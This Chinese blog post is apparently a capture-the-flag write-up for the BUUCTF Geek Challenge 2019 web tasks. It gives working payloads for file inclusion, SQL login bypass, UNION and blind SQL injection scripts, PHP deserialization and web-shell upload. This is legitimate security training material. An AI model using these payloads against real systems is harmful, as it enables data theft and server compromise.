BUUCTF web 极客大挑战 2019

最新推荐文章于 2024-04-25 00:27:16 发布
最新推荐文章于 2024-04-25 00:27:16 发布
阅读量1.7k 收藏 2
点赞数 2
分类专栏: ctf_web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qinying001/article/details/105257247
版权

Secret File

 在源码之中得到一个php页面
在这里插入图片描述
 后面页面之中
在这里插入图片描述
在这里插入图片描述
 根据提示抓包,在其中返回的页面得到了信息
在这里插入图片描述
 得到源码,根据源码,发现存在文件包含漏洞
在这里插入图片描述
 利用php伪协议,获取flag.php的信息,拿取flag
payload:

?file=php://filter/read=convert.base64-encode/resource=flag.php

Havefun

源码中发现代码
在这里插入图片描述
构造输入,获取flag
在这里插入图片描述

EasySQL

 利用万能密码,直接得到flag

admin' or 1=1#

Upload

能上传phtml类型文件
不能包含<?在这里插入图片描述
所以使用javascript中的语法,调用php,实现一句话木马
在这里插入图片描述
利用蚁剑连接,拿到flag
在这里插入图片描述

PHP

在这里插入图片描述
 经过测试,找到了www.zip这个备份文件。
在这里插入图片描述
 index.php中找到了一个反序列化的php函数:
在这里插入图片描述
 class.php里面存在一个类:
在这里插入图片描述
 根据类里面的信息,需要绕过__wakeup()获取flag,具体可以更改序列化后类属性的字段,大于本身的字段就可以绕过。
 私有属性反序列化之后,其属性名前面需要加\0。
payload:

import requests
s = 'O:4:"Name":3:{s:14:"\0Name\0username";s:5:"admin";s:14:"\0Name\0password";i:100;}'
url = 'http://32eeec15-b10b-477f-9dc9-3d492ae6c7df.node3.buuoj.cn/?select='
r = requests.get(url+s)
r.text

Knife

 菜刀连接,在根目录找到flag

LoveSQL

在这里插入图片描述
 首先尝试万能密码admin’ or 1=1#,成功登录进去
在这里插入图片描述
 尝试在username注入:

// order by 注入查看字段,检查出字段为3
?username=admin%27+order+by+4%23&password=123

//联合注入,查找数据库
?username=admin1%27+union+select+1,2,group_concat(schema_name)+from+information_schema.schemata%23&password=123
//information_schema,test,performance_schema,mysql,geek,geek是当前数据库

//搜索geek数据库的表名
?username=admin1%27+union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema='geek'%23&password=123
//geekuser,l0ve1ysq1

//查询表l0ve1ysq1
?username=admin1%27+union+select+1,2,group_concat(column_name)+from+information_schema.columns+where+table_schema='geek'+and+table_name='l0ve1ysq1'%23&password=123
//id,username,password

//查询password字段,得到flag
?username=admin1%27+union+select+1,2,group_concat(password)+from+l0ve1ysq1%23&password=123

Http

在这里插入图片描述
页面提示,访问Secret.php,首字母记得大写。。。
在这里插入图片描述
上burp,加Rerferer
在这里插入图片描述
改UA
在这里插入图片描述
加XFF
在这里插入图片描述
拿到flag

FinalSQL

在这里插入图片描述

sql盲注,但是注入点被隐藏了,可以在源码中找到
在这里插入图片描述
更改源码并输入选择后,跳转到了search.php界面,并且是get传参,之后,检查过滤字符,初步检查过滤了空格,还有内联注释,不能直接内联注释绕过了,改用括号代替空格,最后脚本:
ps: 二分法还是快很多的,延迟也加上,没加延时收到很多错误数据,自己电脑太差了😭

import requests
import sys
import time

url = "http://66bb3fde-091a-402c-9d3e-828369716f57.node3.buuoj.cn/search.php?id=1^"

s = ''
for i in range(1,1000):
    left = 30
    right = 130
    while left != right:
        time.sleep(0.1)
        mid = (left+right)//2
        #url1 = url+"(ascii((substr((select(database())),%d,1)))>%d)" % (i, mid) # 获取数据库
        # 获取表名
        #url1 = url+"(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)" % (i, mid)
        # 获取列名
        #url1 = url+"(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='Flaaaaag'),%d,1))>%d)" % (i, mid)
        # 读取数据
        url1 = url+"(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)" % (i, mid)
        #print(url1)
        r = requests.get(url1)
        if "ERROR" in r.text:
            left = mid+1
        else:
            right = mid
    if left == 30:
        break
    else:
        s += chr(left)
        print(s)
print(s)
个人微信公众号,喜欢的话,随手关注一下啦

在这里插入图片描述

影子019
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF——[挑战 2019]PHP
doraemon12345的博客
06-07 292
打开题目,页面上显示说习惯备份,尝试下载备份www.zip,下载后打开查看 flag文件里并不是flag,查看其他的在class文件中发现代码,应该是让我们反序列化,给出源代码 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct(
BUUCTF系列 // [挑战 2019] Http
qq_45805420的博客
09-25 1504
前言 本题知识点:常用 HTTP 请求头 WP 打开题目,在页面中没有发现明显的提示,查看网页源码,经搜索后发现一个似乎存在猫腻的网页 ‘Secret.php’ 访问该页面,得到第一个提示 题目要求我们从 ‘https://www.Sycsecret.com’ 进入该页面,故使用 burpsuite 抓包,在请求头中增加 Referer 字段即可 Referer HTTP Referer是 header 的一部分,当浏览器向 Web 服务器发送请求的时候,一般会带上 Referer,告诉服务器该网页是从
BUUCTF-MISC-黑帝国~喵喵喵
七堇年的博客
11-16 5017
文章目录1.黑帝国 1.黑帝国 题目描述:Jack很喜欢看黑帝国电影,一天他正在上网时突然发现屏幕不受控制,出现了很多数据再滚屏,结束后留下了一份神秘的数据文件,难道这是另一个世界给Jack留下的信息?聪明的你能帮Jack破解这份数据的意义吗? 注意:得到的 flag 请包上 flag{} 提交 解题步骤:010打开查看,发现二进制文件头i 在这里插入代码片 txt ...
BUUCTF---misc---黑帝国
最新发布
2201_75556700的博客
04-25 252
5、放在winhex中查看图片,将损坏的图片和一张正常的图片进行对比,会发现他们的文件头不太一样。4、尝试打开文件,发现需要密码,用工具破解密码,得到压缩包里面的图片,但是图片损坏了。1、题目描述,下载附件,附件是一个txt文本。文本开头的是个rar文件的头标识。6、将损坏图片头改为jpg格式:FFD8FFE0,保存。2、将文本转换为16进制格式,并输出为rar文件。3、之后会在相应的路径下看到.rar文件。hex_data='这里写文本数据'8、双击图片,可以看到flag。7、便可以看到修改好的图片。
BUUCTF帝国 1
YueXuan_521的博客
11-25 931
BUUCTF帝国 1
BUUCTF -> Web [挑战 2019]Http(详解)
m0_72986388的博客
09-25 1296
之后界面会显示“No!" 是一个URL,指向一个名为 "Sycsecret.buuoj.cn" 的网站或资源。这样就会得到flag之后将flag输入到靶场中这道题就完成了。User-Agent:标识发起请求的用户代理(常为浏览器)。(因为做笔记,所以重新做的,所以显示早就解出这道题了。Referer(请求头字段)表示指示请求的来源页面。所以我们要把此段的浏览器改为Syclover浏览器。"理解为一个链接地址。这样我们就得到了解决本题的有用信息。
web前端
07-22
教程名称:web前端教程目录:【】1、走进前端工程师的世界【】2、HTML5【】3、CSS3【】4、Javascript【】5、常?的库之 jQuery【】6、常?的库之 jQuery UI【】7、常?的库之 jQuery Mobile【】8、常用的库之...
阿里云IoT创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 创新挑战赛》的分享,就挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
学院web前端开发学习教程
05-25
包含bootstrap、html5、php、web前端开发,百度网盘地址
Web3日报 #12
01-08
基于Web3,Solidity,Truffle的一个完整的售卖和购买的简单Dapp demo。 如何在以太坊上构建TodoList – 教程@Riverhttps://www.dappuniversity.com/articles/blockchain-app-tutorial 基于Web3,Solidity,Truffle等...
Web3日报 #6
01-08
如何理解Rust中的可变与不可变? ...@洋芋:本文介绍了Rust标准库中的Cell, RefCell,其作为提供内部可变性的容器,弥补了Rust所有权机制在灵活性上和某些场景下的不足。 学习Polkadot的好地方:Polkadot Wiki ...
BUUCTF__[挑战 2019]Http_题解
风过江南乱的博客
06-21 3896
前言 在35°C的夏天,停了一天的电,晚上才来电,已经ye死 又是一题基础水题。 题目 首先打开是挺好看的一个前端页面。介绍了一个安全技术小组。 做题第一步,当然是F12大法。 于是发现Secret.php ,先访问,提示你不是来自https://www.Sycsecret.com 当然,题目是http ,http有一个知识点就是HTTP报文 header ,有请求头和响应头。也就是一些协议内容。 ...
BUU(Secret File)
m0_65151172的博客
04-08 118
很明显又是代码审计(真烦哪),我们看到这里include一个变量file,这是关键,我们直接访问flag.php行不行?于是我们利用base64编码后在输出便不会被当作php执行,利用php伪协议构造url,具体用法参照。跳转的是active.php可是点击secret之后是end.php证明确实是跳转了,用bp抓个包。很明显不行,估计得查看到源代码才行,php伪协议。画面变更了,看看这个secret里有什么。估计是跳转,返回去F12看一眼。用重发器发现新的地址,跳转。看到这个地址,跳转一下。
BUUCTF Misc 黑帝国 & [MRCTF2020]你能看懂音符吗 & [HBNIS2018]caesar & [HBNIS2018]低个头
网安小趴菜
12-03 999
BUUCTF Misc 黑帝国 & [MRCTF2020]你能看懂音符吗 & [HBNIS2018]caesar & [HBNIS2018]低个头 wp
BUUCTF——phpweb
weixin_45864041的博客
04-17 629
打开题目 可以看到页面上的时间每5秒刷新一次,所以我们直接抓包看页面的数据提交 由页面提交的两个参数可以看到,第一个func是函数名,第二个是传入函数的参数。 所以可以用php的readfile()函数读取index.php的源码。 <?php $disable_fun = array("exec","shell_exec","system","passthru", "proc_open","show_source","phpinfo","popen","dl","eval", "
BUUCTF 2023.1.27
weixin_73880904的博客
01-28 182
一些工具的运用和对一些经验的积累
BUUCTF帝国
m0_49025459的博客
05-23 514
解压,发现一长串得16进制数 在WinHex里创建个新文件,然后粘贴进去 这打眼一看就是压缩包,保存之后,发现有密码,然后跑一下爆破软件 解压出来一张图片,但是打不开, 扔到WinHex里看一下,发现这个文件头有点不对劲 正常得jpg应该是这样得 那我们把原文件改一下 FLAG就出来了 ...
[buuoj]黑帝国
qq_42250840的博客
07-16 555
复现: 解压压缩包,得到txt文件 看开头,rar文件头,存为文件: 需要密码 爆破得密码 解压得到一张png图片,但是打不开 放进winhex,看到应该是jpg文件,文件头错误 修正: 得到flag
buuctf-web-[挑战 2019]PHP
weixin_46079186的博客
07-02 321
题目地址 1.打开题目 提到网站备份我们直接扫描一下网站备份文件,御剑啥的都行,线程一定不要开太大,开5就行开太大可能扫描不出来。扫描到一个www.zip 下载文件打开 打开index.php,应该是反序列化 打开class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; // 私有变量只有本类可以使用 privat
buuctf web 挑战2019
08-24
对于BUUCTF Web挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值